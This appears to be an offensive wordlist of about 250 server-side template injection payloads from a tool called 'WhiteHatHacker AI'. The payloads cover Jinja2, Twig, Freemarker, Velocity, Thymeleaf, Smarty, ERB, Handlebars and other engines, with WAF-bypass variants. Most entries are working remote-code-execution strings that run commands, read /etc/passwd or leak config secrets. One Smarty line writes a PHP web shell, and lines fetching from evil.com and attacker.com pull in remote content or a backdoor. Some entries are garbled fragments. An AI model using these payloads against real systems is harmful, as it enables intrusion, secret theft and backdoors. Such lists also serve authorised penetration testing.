# ============================================================================
# WhiteHatHacker AI — SSTI Payload Wordlist (Comprehensive)
# Categories: Detection, Jinja2, Twig, Freemarker, Velocity, Thymeleaf,
#             Pebble, Smarty, Mako, ERB, Handlebars, EL, Groovy, WAF Bypass
# Total: ~250 payloads
# ============================================================================

# --- DETECTION / PROBE PAYLOADS ---
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
{{7*'7'}}
${7*'7'}
#{7*'7'}
${{7*7}}
*{7*7}
@(7*7)
{{7+7}}
${7+7}
#{7+7}
{{dump(app)}}
{{config}}
${T(java.lang.Runtime)}
a]@127.0.0.1
{{self}}
{{request}}
{{lipsum}}
{{range(10)}}
{{'a'.toUpperCase()}}
{{'a'.getClass()}}
{{''.__class__}}
${''.__class__}
${"freemarker.template.utility.Execute"?new()("id")}

# --- FUZZING / TEMPLATE ENGINE DETECTION ---
a]@127.0.0.1`
p]@127.0.0.1{{7*7}}q
a]@127.0.0.1${7*7}q
a]@127.0.0.1#{7*7}q
a]@127.0.0.1<%= 7*7 %>q
a]@127.0.0.1{{7*'7'}}q
a]@127.0.0.1${{7*7}}q
a]@127.0.0.1*{7*7}q
a]@127.0.0.1@(7*7)q

# --- JINJA2 (Python) ---
{{config}}
{{config.items()}}
{{request.environ}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__bases__[0].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{'a'.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("id").read()')}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{lipsum.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{request.__class__._load_form_data.__globals__['__builtins__']['eval']('__import__("os").popen("id").read()')}}
{{get_flashed_messages.__globals__['__builtins__'].eval('__import__("os").popen("id").read()')}}
{{url_for.__globals__['os'].popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{% for c in ().__class__.__bases__[0].__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['eval']('__import__("os").popen("id").read()') }}{% endif %}{% endfor %}
{% import os %}{{os.popen('id').read()}}
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("id")|attr("read")()}}

# --- TWIG (PHP) ---
{{7*7}}
{{7*'7'}}
{{_self}}
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{'/etc/passwd'|file_excerpt(1,30)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{['id']|filter('exec')}}
{{['id']|filter('passthru')}}
{{['id']|map('system')}}
{{['cat /etc/passwd']|map('system')}}
{{'cat /etc/passwd'|filter('system')}}
{{app.request.query.filter(0,'id','system',1024,true)}}

# --- FREEMARKER (Java) ---
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
[#assign ex="freemarker.template.utility.Execute"?new()]${ex("id")}
${object.getClass().forName("java.lang.Runtime").getRuntime().exec("id")}
<#assign classloader=object.class.protectionDomain.classLoader><#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")><#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)><#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>${dwf.newInstance(ec,null)("id")}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(",")}

# --- VELOCITY (Java) ---
#set($x='')##
$class.inspect("java.lang.Runtime").type.getRuntime().exec("id")
#set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("id")
#set($s="")$s.class.forName("java.lang.Runtime").getMethod("exec",$s.class.forName("java.lang.String")).invoke($s.class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")
#set($runtime = $class.inspect("java.lang.Runtime").type)#set($process = $runtime.getRuntime().exec("id"))$process
${T(java.lang.Runtime).getRuntime().exec('id')}

# --- THYMELEAF (Java / Spring) ---
${T(java.lang.Runtime).getRuntime().exec('id')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
${#this.getClass().forName('java.lang.Runtime').getRuntime().exec('id')}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}

# --- PEBBLE (Java) ---
{% set cmd = 'id' %}
{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}
{{ (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec('id') }}
{{ beans.get('org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration$SpelView').engine.evaluate('T(java.lang.Runtime).getRuntime().exec("id")') }}

# --- SMARTY (PHP) ---
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('id')}
{$smarty.version}
{if phpinfo()}{/if}
{if system('id')}{/if}

# --- MAKO (Python) ---
<%import os%>${os.popen('id').read()}
<%import os; x=os.popen('id').read()%>${x}
${self.module.cache.util.os.system("id")}
<%import subprocess%>${subprocess.check_output('id',shell=True)}

# --- ERB (Ruby) ---
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
<%= File.read('/etc/passwd') %>
<%=`cat /etc/passwd`%>
<%= require 'open-uri'; open('http://evil.com/').read %>

# --- HANDLEBARS (JavaScript) ---
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
{{this.constructor.constructor('return this.process.mainModule.require("child_process").execSync("id").toString()')()}}

# --- EXPRESSION LANGUAGE / EL (Java) ---
${applicationScope}
${pageContext}
${request.getServletContext().getClassLoader()}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec("id")}
${pageContext.request.getSession().getServletContext().getClassLoader().getResource("")}
#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","".getClass()).invoke(request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")}

# --- GROOVY ---
${"id".execute().text}
${new File("/etc/passwd").text}

# --- DOT NET (Razor) ---
@(1+2)
@System.Diagnostics.Process.Start("cmd","/c whoami")
@{var p = new System.Diagnostics.Process();p.StartInfo.FileName="cmd";p.StartInfo.Arguments="/c id";p.Start();}

# --- WAF BYPASS VARIANTS ---
{%25+for+c+in+[1,2,3]+%25}{{c}}{%25+endfor+%25}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
{{request['__class__']['__mro__'][1]['__subclasses__']()}}
{{''.['__class__']['__mro__'][1]['__subclasses__']()}}
{{'a]@127.0.0.1\x5f\x5fclass\x5f\x5f'}}
{{[]['\x5f\x5fclass\x5f\x5f']}}
{{''['\x5f\x5fclass\x5f\x5f']}}
{{config['SECRET_KEY']}}
{{config['\x53ECRET_KEY']}}
{%set a='__cla'%}{%set b='ss__'%}{{''[a~b]}}

# --- BLIND SSTI DETECTION ---
{{7*7}}{{7*7}}
${{7*7}}
#{{7*7}}
{{7777+1}}
${7777+1}
<%= 7777+1 %>
{{7777*7777}}
${7777*7777}

# --- ENVIRONMENT / CONFIG LEAKAGE ---
{{config}}
{{settings}}
{{request.environ}}
{{self._TemplateReference__context}}
{{request.__class__.__mro__}}
{{''.__class__.__mro__}}
${env}
${spring}
${application}

# ============================================================================
# EXPANSION: Advanced SSTI ??? Multi-Engine, Filter Bypass, RCE
# ============================================================================

# --- Jinja2 Advanced (Python/Flask) ---
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()[400]('id',shell=True,stdout=-1).communicate()}}
{{lipsum.__globals__['os'].popen('whoami').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{().__class__.__bases__[0].__subclasses__()}}
{{request.application.__self__._get_data_for_json.__code__}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='Popen' %}{{c('id',shell=True,stdout=-1).communicate()}}{% endif %}{% endfor %}
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('whoami').read()}}

# --- Jinja2 Filter Bypass ---
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
{{request|attr("__class__")}}
{%set a='__cla'+'ss__'%}{{request|attr(a)}}
{{(config|string)[2]}}
{{''['\x5f\x5fclass\x5f\x5f']}}
{{''['__cl''ass__']}}
{{dict(__cla=1,ss__(=1)|join}}
{{(''|attr('\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f'))}}

# --- Twig Advanced (PHP/Symfony) ---
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{app.request.server.get('DOCUMENT_ROOT')}}
{{_self.env.setCache("ftp://attacker.com")}}{{_self.env.loadTemplate("backdoor")}}
{{'/etc/passwd'|file_excerpt(1,30)}}
{{['id']|filter('exec')}}

# --- Freemarker Advanced (Java) ---
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
[#assign ex="freemarker.template.utility.Execute"?new()]${ex("whoami")}
<#assign is=.data_model.ObjectConstructor("java.io.InputStreamReader",(.data_model.ObjectConstructor("java.lang.ProcessBuilder",["id"]).start()).getInputStream())>${is}
${.data_model.ObjectConstructor("java.lang.ProcessBuilder",["id"]).start()}
<#assign classloader=object?api.class.protectionDomain.classLoader>
${product.getClass().forName("java.lang.Runtime").getMethod("exec",object.getClass().forName("java.lang.String")).invoke(object.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")}

# --- Velocity Advanced (Java) ---
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$x.class.forName('java.lang.Runtime').getRuntime().exec('id')
#set($process=$rt.getRuntime().exec('whoami'))
#set($reader=$process.getInputStream())

# --- Pebble (Java) ---
{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}{{(1).TYPE.forName('java.lang.String').constructors[0].newInstance(([bytes]).toArray())}}

# --- Thymeleaf (Java/Spring) ---
${T(java.lang.Runtime).getRuntime().exec('id')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}
__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x
*{T(java.lang.Runtime).getRuntime().exec('id')}
[[${T(java.lang.Runtime).getRuntime().exec('id')}]]

# --- EL / Expression Language (Java) ---
${Runtime.getRuntime().exec("id")}
${applicationScope}
${pageContext.request.getSession().getServletContext().getClassLoader()}
#{7*7}
${T(Thread).sleep(5000)}

# --- Handlebars/Mustache ---
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('whoami');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

# --- ERB (Ruby) ---
<%= system('id') %>
<%= `whoami` %>
<%= IO.popen('id').readlines() %>
<%= require 'open3'; Open3.capture2('whoami')[0] %>

# --- Tornado (Python) ---
{% import os %}{{ os.popen("id").read() }}
{% import subprocess %}{{ subprocess.check_output("id", shell=True).decode() }}

# --- Mathematical Detection Probes (Multi-Engine) ---
${7*7}
${{7*7}}
#{7*7}
*{7*7}
@(7*7)
{{7*'7'}}
${7*'7'}
<%= 7*7 %>
${foobar}
{{=7*7}}
{{7+7}}
[[7*7]]
((7*7))
